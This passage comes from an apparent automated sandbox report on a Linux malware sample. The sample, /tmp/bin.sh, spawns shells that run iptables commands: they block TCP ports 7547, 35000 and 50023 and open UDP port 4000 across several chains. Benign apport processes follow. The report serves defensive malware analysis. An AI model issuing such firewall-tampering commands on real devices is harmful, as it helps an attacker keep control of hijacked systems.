                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7230 Parent PID: 7224

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7230 Parent PID: 7224

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7241 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7241 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7248 Parent PID: 7241

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7248 Parent PID: 7241

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7255 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7255 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7261 Parent PID: 7255

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7261 Parent PID: 7255

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7280 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7280 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7290 Parent PID: 7280

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7290 Parent PID: 7280

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7314 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7314 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7316 Parent PID: 7314

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7316 Parent PID: 7314

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7317 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7317 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7319 Parent PID: 7317

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7319 Parent PID: 7317

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7321 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7321 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7327 Parent PID: 7321

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7327 Parent PID: 7321

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7344 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7344 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7351 Parent PID: 7344

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7351 Parent PID: 7344

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7369 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7369 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7378 Parent PID: 7369

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7378 Parent PID: 7369

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p udp --dport 4000 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7395 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7395 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7405 Parent PID: 7395

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7405 Parent PID: 7395

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7420 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7420 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7426 Parent PID: 7420

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7426 Parent PID: 7420

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7432 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7432 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7439 Parent PID: 7432

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7439 Parent PID: 7432

                                                                                                    General

                                                                                                    Start time:15:44:45
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: upstart PID: 7470 Parent PID: 3310

                                                                                                    General

                                                                                                    Start time:15:45:11
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/upstart
                                                                                                    Arguments:n/a
                                                                                                    File size:0 bytes
                                                                                                    MD5 hash:unknown

                                                                                                    Analysis Process: sh PID: 7470 Parent PID: 3310

                                                                                                    General

                                                                                                    Start time:15:45:11
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7471 Parent PID: 7470

                                                                                                    General

                                                                                                    Start time:15:45:11
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: date PID: 7471 Parent PID: 7470

                                                                                                    General

                                                                                                    Start time:15:45:11
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/date
                                                                                                    Arguments:date
                                                                                                    File size:68464 bytes
                                                                                                    MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                    Analysis Process: sh PID: 7472 Parent PID: 7470

                                                                                                    General

                                                                                                    Start time:15:45:11
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: apport-checkreports PID: 7472 Parent PID: 7470

                                                                                                    General

                                                                                                    Start time:15:45:11
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/usr/share/apport/apport-checkreports
                                                                                                    Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                                                                                                    File size:1269 bytes
                                                                                                    MD5 hash:1a7d84ebc34df04e55ca3723541f48c9

                                                                                                    Analysis Process: upstart PID: 7497 Parent PID: 3310

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/upstart
                                                                                                    Arguments:n/a
                                                                                                    File size:0 bytes
                                                                                                    MD5 hash:unknown

                                                                                                    Analysis Process: sh PID: 7497 Parent PID: 3310

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7498 Parent PID: 7497

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: date PID: 7498 Parent PID: 7497

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/date
                                                                                                    Arguments:date
                                                                                                    File size:68464 bytes
                                                                                                    MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                    Analysis Process: sh PID: 7504 Parent PID: 7497

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: apport-gtk PID: 7504 Parent PID: 7497

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/usr/share/apport/apport-gtk
                                                                                                    Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                    File size:23806 bytes
                                                                                                    MD5 hash:ec58a49a30ef6a29406a204f28cc7d87

                                                                                                    Analysis Process: upstart PID: 7524 Parent PID: 3310

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/upstart
                                                                                                    Arguments:n/a
                                                                                                    File size:0 bytes
                                                                                                    MD5 hash:unknown

                                                                                                    Analysis Process: sh PID: 7524 Parent PID: 3310

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7525 Parent PID: 7524

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: date PID: 7525 Parent PID: 7524

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/date
                                                                                                    Arguments:date
                                                                                                    File size:68464 bytes
                                                                                                    MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                    Analysis Process: sh PID: 7526 Parent PID: 7524

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: apport-gtk PID: 7526 Parent PID: 7524

                                                                                                    General

                                                                                                    Start time:15:45:12
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/usr/share/apport/apport-gtk
                                                                                                    Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                    File size:23806 bytes
                                                                                                    MD5 hash:ec58a49a30ef6a29406a204f28cc7d87